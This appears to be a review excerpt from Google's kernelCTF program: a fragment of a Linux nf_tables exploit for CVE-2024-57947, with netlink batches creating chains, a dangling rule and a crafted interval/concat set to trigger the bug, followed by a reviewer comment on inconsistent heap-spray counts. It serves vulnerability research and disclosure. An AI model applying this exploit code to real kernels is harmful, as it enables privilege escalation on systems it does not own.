pocs/linux/kernelctf/CVE-2024-57947_mitigation/exploit/mitigation-v3-6.1.55/exploit.c

```diff
@@ -0,0 +1,966 @@
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain_rop);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain1);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_dangling_4);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+}
+
+void del_chain(char* chain_name){
+    struct nftnl_chain * chain = nftnl_chain_alloc();
+    nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table1_name);
+    nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
+    nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, 0);
+
+    batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, 0, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+}
+
+void trigger(char * trig_set_name, char * trig_chain_name){
+    uint8_t desc_concat[64] = {0,};
+    desc_concat[0] = 4;
+    desc_concat[1] = 2;
+    desc_concat[2] = 1;
+
+    uint32_t key_size = 0xc;
+
+    struct nftnl_set * set =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set, NFTNL_SET_NAME, trig_set_name);
+    nftnl_set_set_u32(set, NFTNL_SET_FLAGS,  NFT_SET_INTERVAL | NFT_SET_CONCAT | NFT_SET_TIMEOUT | NFT_SET_MAP);
+    nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, key_size);
+    nftnl_set_set_u32(set, NFTNL_SET_ID, 1337);
+    nftnl_set_set_u32(set, NFTNL_SET_DESC_SIZE, 0x200);
+    nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT);
+    nftnl_set_set_data(set, NFTNL_SET_DESC_CONCAT, desc_concat, 4);
+
+    uint8_t key_data[0x200] = {0,};
+    uint8_t key_end_data[0x2000] = {0,};
+
+    unsigned long user_data[0x100] = {0,};
+
+    *(unsigned long*) &key_data[0] = 0xb000001010a;
+    *(unsigned long*) &key_data[8] = 6;
+
+    *(unsigned long*) &key_end_data[0] = 0x1400ff02010a;
+    *(unsigned long*) &key_end_data[8] = 17;
+
+    struct nftnl_set * set_elem_triggers[0x200];
```

Comment:
There seems to be an inconsistency between spraying iteration counts:

The code:
* allocates an array with `0x200` == `512` slots for the objects
* actually creates `20` * `20` == `400` objects
* uses `200` objects in the batch

It’s not clear whether these are typos and bugs in the exploit (hex `0x200` != decimal `200`) or it is intentional.

Please make the code consistent or comment here if this was intentional.

Read more here: https://google.github.io/security-research/kernelctf/style_guide#match-iteration-count-for-allocation-creation-and-usage